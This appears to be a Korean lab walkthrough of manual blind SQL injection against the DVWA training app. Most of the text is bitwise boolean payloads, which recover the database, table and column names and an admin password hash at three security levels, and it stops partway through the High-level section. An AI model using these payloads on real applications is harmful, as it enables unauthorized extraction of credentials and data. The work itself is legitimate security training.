[DVWA] SQL Injection (Blind 수동 점검)

Vulnerability: SQL Injection (Blind)

Blind SQL Injection을 이용하여 DB 내부의 데이터를 조회하는 것을 목적으로 한다. 해당 실습 문제의 경우 ID를 입력했을 때 유효한 ID(존재하는 ID)인지 아닌지(올바르지 않은/존재하지 않는 ID)를 판별해주는 웹 애플리케이션이다.

유효한  ID를 입력하는 경우 (입력한 값이 참인 경우)에는 "User ID exists in the database." 라는 결과 값을 얻을 수 있고, 유효하지 않은 ID를 입력하는 경우 (입력한 값이 거짓인 경우)에는 "User ID is MISSING from the database." 라는 결과 값을 얻게 된다.

본 실습에서는 nmap /sqlmap과 같은 탐지 프로그램(자동화 툴)을 사용하지 않고 수동 점검하는 방법만 시도할 것이다.

(자동화 툴을 이용하거나 python을 이용한 자동화 방법은 추후에 정리해보려 한다.)

 

Vuln Point

참인 값 (1=1)
1' and 1=1 #
-> User ID exists in the database.

거짓인 값(1=2)
1' and 1=2 # 
-> User ID is MISSING from the database.

and 연산을 이용하여 참인 값과 거짓인 값에 대한 결과 값이 다르게 나오는 것을 확인할 수 있다. 이것을 통해 SQL Injection 취약점이 존재한다고 의심해볼 수 있다.

 

True/False

참(True)인 값과 거짓(False)인 값에 대한 차이를 통해 Blind SQL Injection을 이용할 수 있게 된다.

본 실습 문제의 경우 ID 입력에 따른 유효한 ID 여부를 판단하고 있다. DB의 내용을 직접적으로 유출(출력)하고 있지는 않고, 단지 옳다(True), 틀리다(False)라는 반응만 내보낸다는 것이다. 하지만 참인 값과, 거짓인 값의 차이가 존재하므로서 질의에 대한 응답 차이를 통해 Blind SQLi를 실시할 수 있다.

and 연산의 특징을 이용하여 참 and 참 / 참 and 거짓의 값이 각각 참/거짓인 것을 이용한다.

항상 참(1=1) / 항상 거짓(1=2) 인 값을 and 를 이용하여 묶어주어 WHERE 문이 참인 경우 조회에 성공하고, WHERE 문이 거짓인 경우 조회에 실패하도록하는 것이다.

True and True = True
SELECT * FROM users WHERE user_id='1' and 1=1 #';
                                                           (True)

True and False = False
SELECT * FROM users WHERE user_id='1' and 1=2 #';
                                                         (False)

 

DVWA Blind SQL Injection 실습

실습 환경
- Windows Docker를 이용한 DVWA
- Windows 환경의 Burp Suite

Blind SQL Injection의 경우, 한 줄의 출력에 대한 한 글자씩만 확인이 가능하다. 그러므로 LIMIT를 이용해야 한다.

 

Security Level: Low

LOW 레벨의 경우 입력 값에 대한 제한이 딱히 없다. DB이름 / 원하는 테이블 / 원하는 컬럼 / 원하는 데이터 를 각각 한 개씩만 뽑아볼 것이다.

Blind SQL Injection의 Process에 따라 진행한다. 우선 참/거짓에 대한 응답을 확인해본다.

 

True / False

참(True)인 값: 1' and 1=1 #

거짓(False)인 값: 1' and 1=2 #

 

공격 쿼리(Query)

우선 공격 쿼리를 작성하고 SQL 구문이 들어갈 자리에 원하는 SQL 구문을 삽입하도록 한다.

Blind SQLi 의 경우 substr 함수를 이용하여 원하는 글자 부분을 잘라내고, 해당 값을 ascii 코드로 변환하여 이진탐색을 진행한다. 여기서는 부등호(>,<) 를 이용하지 않고 논리연산(이진코드)을 이용하려 한다. 1, 2, 4, 8, 16, 32, 64의 값과 논리연산을 진행하여 해당 값이 참인지 거짓인지 확인하여 참인 값의 합이 해당하는 ascii코드 값이 된다.

한 글자의 값을 확인하기 위한 '한 세트'
1' and ascii(substr((select __SQL__),1,1))&1=1#
1' and ascii(substr((select __SQL__),1,1))&2=2#
1' and ascii(substr((select __SQL__),1,1))&4=4#
1' and ascii(substr((select __SQL__),1,1))&8=8#
1' and ascii(substr((select __SQL__),1,1))&16=16#
1' and ascii(substr((select __SQL__),1,1))&32=32#
1' and ascii(substr((select __SQL__),1,1))&64=64#

 

DB 이름 확인하기

select database()

DB의 이름을 한글자씩 확인해보면 다음과 같다.

1' and ascii(substr((select database()),1,1))&1=1# (거짓)
1' and ascii(substr((select database()),1,1))&2=2# (거짓)
1' and ascii(substr((select database()),1,1))&4=4# (참)
1' and ascii(substr((select database()),1,1))&8=8# (거짓)
1' and ascii(substr((select database()),1,1))&16=16# (거짓)
1' and ascii(substr((select database()),1,1))&32=32# (참)
1' and ascii(substr((select database()),1,1))&64=64# (참)
4, 32, 64 -> 100 -> d

논리 연산의 결과를 보면 ascii 코드 100에 해당하므로 d가 된다.

1' and ascii(substr((select database()),2,1))&1=1# (거짓)
1' and ascii(substr((select database()),2,1))&2=2# (참)
1' and ascii(substr((select database()),2,1))&4=4# (참)
1' and ascii(substr((select database()),2,1))&8=8# (거짓)
1' and ascii(substr((select database()),2,1))&16=16# (참)
1' and ascii(substr((select database()),2,1))&32=32# (참)
1' and ascii(substr((select database()),2,1))&64=64# (참)
2, 4, 16, 32, 64 -> 118 -> v

논리 연산의 결과를 보면 ascii 코드 118에 해당하므로 v가 된다.

1' and ascii(substr((select database()),3,1))&1=1# (참)
1' and ascii(substr((select database()),3,1))&2=2# (참)
1' and ascii(substr((select database()),3,1))&4=4# (참)
1' and ascii(substr((select database()),3,1))&8=8# (거짓)
1' and ascii(substr((select database()),3,1))&16=16# (참)
1' and ascii(substr((select database()),3,1))&32=32# (참)
1' and ascii(substr((select database()),3,1))&64=64# (참)
1, 2, 4, 16, 32, 64 -> 119 -> w

논리 연산의 결과를 보면 ascii 코드 119에 해당하므로 w가 된다.

1' and ascii(substr((select database()),4,1))&1=1# (참)
1' and ascii(substr((select database()),4,1))&2=2# (거짓)
1' and ascii(substr((select database()),4,1))&4=4# (거짓)
1' and ascii(substr((select database()),4,1))&8=8# (거짓)
1' and ascii(substr((select database()),4,1))&16=16# (거짓)
1' and ascii(substr((select database()),4,1))&32=32# (참)
1' and ascii(substr((select database()),4,1))&64=64# (참)
1, 32, 64 -> 97 -> a

논리 연산의 결과를 보면 ascii 코드 97에 해당하므로 a가 된다.

위의 각 글자를 조합하면 DB이름은 dvwa인 것을 알 수 있다.

 

TABLE 이름 확인하기

원하는 테이블의 위치를 이미 알고서 진행한다.(2번째에 존재하는 테이블을 조회할 것이다.)

select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1

해당 Table의 이름을 한글자씩 확인해 보면 다음과 같다.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&1=1# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&2=2# (거짓)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&4=4# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&8=8# (거짓)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&16=16# (참)
' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&32=32# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&64=64# (참)
1, 4, 16, 32, 64 -> 117 -> u

논리 연산의 결과를 보면 ascii 코드 117에 해당하므로 u가 된다.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&1=1# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&2=2# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&4=4# (거짓)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&8=8# (거짓)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&16=16# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&32=32# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&64=64# (참)
1, 2, 16, 32, 64 -> 115 -> s

논리 연산의 결과를 보면 ascii 코드 115에 해당하므로 s가 된다.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&1=1# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&2=2# (거짓)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&4=4# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&8=8# (거짓)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&16=16# (거짓)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&32=32# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&64=64# (참)
1, 4, 32, 64 -> 101 -> e

논리 연산의 결과를 보면 ascii 코드 101에 해당하므로 e가 된다.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&1=1# (거짓)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&2=2# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&4=4# (거짓)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&8=8# (거짓)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&16=16# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&32=32# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&64=64# (거짓)
2, 16, 32, 64 -> 114 -> r

논리 연산의 결과를 보면 ascii 코드 114에 해당하므로 r이 된다.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&1=1# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&2=2# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&4=4# (거짓)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&8=8# (거짓)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&16=16# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&32=32# (참)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&64=64# (참)
1, 2, 16, 32, 64 -> 115 -> s

논리 연산의 결과를 보면 ascii 코드 115에 해당하므로 s가 된다.

위의 각 글자를 조합하면 해당 Table 이름은 users인 것을 알 수 있다.

 

COLUMN 이름 확인하기

원하는 컬럼의 위치를 이미 알고서 진행한다.(users 테이블의 5번째에 존재하는 컬럼을 조회할 것이다.)

select column_name from information_schema.columns where table_name = 'users' limit 4,1

해당 Column의 이름을 한글자씩 확인해 보면 다음과 같다.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&1=1# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&2=2# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&4=4# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&8=8# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&16=16# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&32=32# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&64=64# (참)
16, 32, 64 -> 112 -> p

논리 연산의 결과를 보면 ascii 코드 112에 해당하므로 p가 된다.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&1=1# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&2=2# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&4=4# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&8=8# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&16=16# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&32=32# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&64=64# (참)
1, 32, 64 -> 97 -> a

논리 연산의 결과를 보면 ascii 코드 97에 해당하므로 a가 된다.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&1=1# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&2=2# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&4=4# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&8=8# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&16=16# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&32=32# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&64=64# (참)
1, 2, 16, 32, 64 -> 115 -> s

논리 연산의 결과를 보면 ascii 코드 115에 해당하므로 s가 된다.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&1=1# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&2=2# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&4=4# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&8=8# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&16=16# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&32=32# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&64=64# (참)
1, 2, 16, 32, 64 -> 115 -> s

논리 연산의 결과를 보면 ascii 코드 115에 해당하므로 s가 된다.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&1=1# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&2=2# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&4=4# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&8=8# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&16=16# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&32=32# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&64=64# (참)
1, 2, 4, 16 ,32 ,64 -> 119 -> w

논리 연산의 결과를 보면 ascii 코드 119에 해당하므로 w가 된다.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&1=1# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&2=2# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&4=4# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&8=8# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&16=16# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&32=32# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&64=64# (참)
1, 2, 4, 8, 32, 64 -> 111 -> o

논리 연산의 결과를 보면 ascii 코드 111에 해당하므로 o가 된다.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&1=1# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&2=2# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&4=4# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&8=8# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&16=16# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&32=32# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&64=64# (참)
2, 16, 32, 64 -> 114 -> r

논리 연산의 결과를 보면 ascii 코드 114에 해당하므로 r이 된다.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&1=1# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&2=2# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&4=4# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&8=8# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&16=16# (거짓)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&32=32# (참)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&64=64# (참)
4, 32, 64 -> 100 -> d

논리 연산의 결과를 보면 ascii 코드 100에 해당하므로 d가 된다.

위의 각 글자를 조합하면 해당 Column 이름은 password인 것을 알 수 있다.

 

DATA 확인하기

원하는 데이터의 위치를 이미 알고서 진행한다.( users 테이블의 user 컬럼의 admin 데이터에 매치되는 password 컬럼의 첫 번째 값에 해당하는 데이터를 조회할 것이다.) 

다음의 데이터는 SQL Injection에서 조회한 결과이다. 다음의 데이터를 Blind SQL Injection을 이용하여 조회하고 일치하는지 여부를 확인해 볼 것이다.

select password from users limit 0,1

해당 Data의 값을 한글자씩 확인해 보면 다음과 같다. (Low 레벨에 한하여, 32 자의 결과 전부를 적어 본다.)

1' and ascii(substr((select password from users limit 0,1),1,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),1,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),1,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),1,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),1,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),1,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),1,1))&64=64#
1, 4, 16, 32 -> 53 -> 5

논리 연산의 결과를 보면 ascii 코드 53에 해당하므로 5가 된다.

1' and ascii(substr((select password from users limit 0,1),2,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),2,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),2,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),2,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),2,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),2,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),2,1))&64=64#
2, 4, 32, 64 -> 102 -> f

논리 연산의 결과를 보면 ascii 코드 102에 해당하므로 f가 된다.

1' and ascii(substr((select password from users limit 0,1),3,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),3,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),3,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),3,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),3,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),3,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),3,1))&64=64#
4, 16, 32 -> 52 -> 4

논리 연산의 결과를 보면 ascii 코드 52에 해당하므로 4가 된다.

4) 4, 32, 64 -> 100 -> d
5) 1, 2, 32, 64 -> 99 -> c
6) 1, 2, 32, 64 -> 99 -> c
7) 1, 2, 16, 32 -> 51 -> 3
8) 2, 32, 64 -> 98 -> b
9) 1, 4, 16, 32 -> 53 -> 5
10) 1, 32, 64 -> 97 -> a
11) 1, 32, 64 -> 97 -> a
12) 1, 2, 4, 16, 32 -> 55 -> 7
13) 2, 4, 16, 32 -> 54 -> 6
14) 1, 4, 16, 32 -> 53 -> 5
15) 4, 32, 64 -> 100 -> d
16) 2, 4, 16, 32 -> 54 -> 6
17) 1, 16, 32 -> 49 -> 1
18) 4, 32, 64 -> 100 -> d
19) 8, 16, 32 -> 56 -> 8
20) 1, 2, 16, 32 -> 51 -> 3
21) 2, 16, 32 -> 50 -> 2
22) 1, 2, 4, 16, 32 -> 55 -> 7
23) 4, 32, 64 -> 100 -> d
24) 1, 4, 32, 64 -> 101 -> e
25) 2, 32, 64 -> 98 -> b
26) 8, 16, 32 -> 56 -> 8
27) 8, 16, 32 -> 56 -> 8
28) 2, 16, 32 -> 50 -> 2
29) 1, 2, 32, 64 -> 99 -> c
30) 2, 4, 32, 64 -> 102 -> f

4 ~ 30 번째의 논리 연산의 결과를는 위와 같다.

1' and ascii(substr((select password from users limit 0,1),31,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),31,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),31,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),31,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),31,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),31,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),31,1))&64=64#
1, 8, 16, 32 -> 57 -> 9

논리 연산의 결과를 보면 ascii 코드 57에 해당하므로 9가 된다.

1' and ascii(substr((select password from users limit 0,1),32,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),32,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),32,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),32,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),32,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),32,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),32,1))&64=64#
1, 8, 16, 32 -> 57 -> 9

논리 연산의 결과를 보면 ascii 코드 57에 해당하므로 9가 된다.

위의 각 글자를 조합하면 해당 Data의 값은 다음과 같고, 이를 이미 알고 있는 값과 비교보면 일치하는 것을 확인할 수 있다.

5f4dcc3b5aa765d61d8327deb882cf99

위와 같이 Blind SQL Injection을 통해 값을 알아낼 수 있다.

---

Security Level: Medium

Medium 레벨의 경우 위와 같이 mysqli_real_escape_string 을 이용하고 있어서 ' 가 먹히지 않는다. 그래서 LIMIT을 이용하여 데이터를 찾아줄 것이다. 해당 레벨에서는 DB 이름, TABLE 이름, COLUMN이름, DATA 의 각 첫글자만 확인하는 식으로 넘길 것이다.(가능한지의 여부만 확인한다는 것이다.)

우선 참/거짓 값에 대한 응답을 확인해본다.

 

True/False

Medium 레벨의 경우 직접 입력을 위한 창이 없기 때문에 파라미터 변조를 통해서 입력을 진행한다.

참(True)인 값: 1 and 1=1

거짓(False)인 값: 1 and 1=2

 

공격 쿼리(Query)

우선 공격 쿼리를 작성하고 SQL 구문이 들어갈 자리에 원하는 SQL 구문을 삽입하도록 한다.

Medium 레벨에서는 위에서 확인했듯이 mysqli_real_escape_sting을 이용하고 있기 때문에 ' 가 인식되지 않는다. 그러므로 LIMIT을 추가적으로 이용한다.

한 글자의 값을 확인하기 위한 '한 세트'
1+and+ascii(substr((select+__SQL__),1,1))%261=1
1+and+ascii(substr((select+__SQL__),1,1))%262=2
1+and+ascii(substr((select+__SQL__),1,1))%264=4
1+and+ascii(substr((select+__SQL__),1,1))%268=8
1+and+ascii(substr((select+__SQL__),1,1))%2616=16
1+and+ascii(substr((select+__SQL__),1,1))%2632=32
1+and+ascii(substr((select+__SQL__),1,1))%2664=64

 

DB이름 확인하기

select database()

DB 이름이 dvwa라는 사실을 알고 있다. 첫 글자에 대하여 d가 나오는지 확인해본다.

1+and+ascii(substr((select+database()),1,1))%261=1
1+and+ascii(substr((select+database()),1,1))%262=2
1+and+ascii(substr((select+database()),1,1))%264=4
1+and+ascii(substr((select+database()),1,1))%268=8
1+and+ascii(substr((select+database()),1,1))%2616=16
1+and+ascii(substr((select+database()),1,1))%2632=32
1+and+ascii(substr((select+database()),1,1))%2664=64
4, 32, 64 -> 100 -> d

논리 연산의 결과를 보면 ascii 코드 100에 해당하므로 d가 된다.

 

TABLE 이름 확인하기

select table_name from information_schema.tables limit 1,1

원하는 테이블이 2번째에 위치하고, users 라는 사실을 알고 있다. 첫 글자에 대하여 u가 나오는지 확인해본다.

1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%261=1 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%262=2 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%264=4 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%268=8 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%2616=16 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%2632=32 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%2664=64
1, 4, 16, 32, 64 -> 117 -> u

논리 연산의 결과를 보면 ascii 코드 117에 해당하므로 u가 된다.

 

COLUMN 이름 확인하기

select column_name from information_schema.columns limit 7,1

원하는 컬럼이 8번째에 존재하고, password라는 사실을 알고 있다. 첫 글자에 대하여 p가 나오는지 확인해본다. (8번째 인 이유는 ' 가 먹히지 않기 때문에 guestbook 테이블의 컬럼도 출력되고 있기 때문에 해당 컬럼이 총 3개이고, users 테이블에서 password 컬럼이 5번째에 위치하기 때문이다.)

1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%261=1 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%262=2 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%264=4 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%268=8 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%2616=16 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%2632=32 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%2664=64
16, 32, 64 -> 112 -> p

논리 연산의 결과를 보면 ascii 코드 112에 해당하므로 p가 된다.

 

DATA 확인하기

select password from users limit 0,1

확인해 볼 데이터가 password 컬럼의 첫번째 데이터이고, 해당 값이 5f4dcc3b5aa765d61d8327deb882cf99임을 알고 있다. 첫 글자에 대하여 5가 나오는지 확인해본다.

1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%261=1 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%262=2 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%264=4 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%268=8 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%2616=16 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%2632=32 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%2664=64
1, 4, 16, 32 -> 53 -> 5

논리 연산의 결과를 보면 ascii 코드 53에 해당하므로 5가 된다.

---

Security Level: High

High 레벨의 경우 입력을 위한 애플리케이션을 사용하는 것 이외에 방식은 Low 레벨과 거의 동일하다고 볼 수 있다.

해당 레벨에서도 DB 이름, TABLE 이름, COLUMN이름, DATA 의 각 첫글자만 확인하는 식으로 넘길 것이다. (가능한지의 여부만 확인한다는 것이다.)

우선 참/거짓 값에 대한 응답을 확인해본다.

 

True/False

어떤 입력을 하든, 입력용 애플리케이션에는 Cookie ID set! 이라는 동일한 메시지만 출력된다. 하지만 파라미터를 확인해보면 해당 입력이 들어가는 것을 확인할 수 있다.

참(True)인 값: 1' and 1=1 #

거짓(False)인 값: 1' and 1=2 #

 

DB이름 확인하기

select database()

DB 이름이 dvwa라는 사실을 알고 있다. 첫 글자에 대하여 d가 나오는지 확인해본다.

1' and ascii(substr((select database()),1,1))&1=1#
1' and ascii(substr((select database()),1,1))&2=2#
1' and ascii(substr((select database()),1,1))&4=4#
1' and ascii(substr((select database()),1,1))&8=8#
1' and ascii(substr((select database()),1,1))&16=16#
1' and ascii(substr((select database()),1,1))&32=32#
1' and ascii(substr((select database()),1,1))&64=64#
4, 32, 64 -> 100 -> d

논리 연산의 결과를 보면 ascii 코드 100에 해당하므로 d가 된다.

 

TABLE 이름 확인하기

select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1

원하는 테이블이 2번째에 위치하고, users 라는 사실을 알고 있다. 첫 글자에 대하여 u가 나오는지 확인해본다.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&1=1#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&2=2#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&4=4#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&8=8#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&16=16#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&32=32#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&64=64#
1, 4, 16, 32, 64 -> 117 -> u

논리 연산의 결과를 보면 ascii 코드 117에 해당하므로 u가 된다.

 

COLUMN 이름 확인하기

select column_name from information_schema.columns where table_name = 'users' limit 4,1

원하는 컬럼이 users 테이블의 5번째에 위치하고, password라는 사실을 알고 있다. 첫 글자에 대하여 p가 나오는지 확인해본다. 

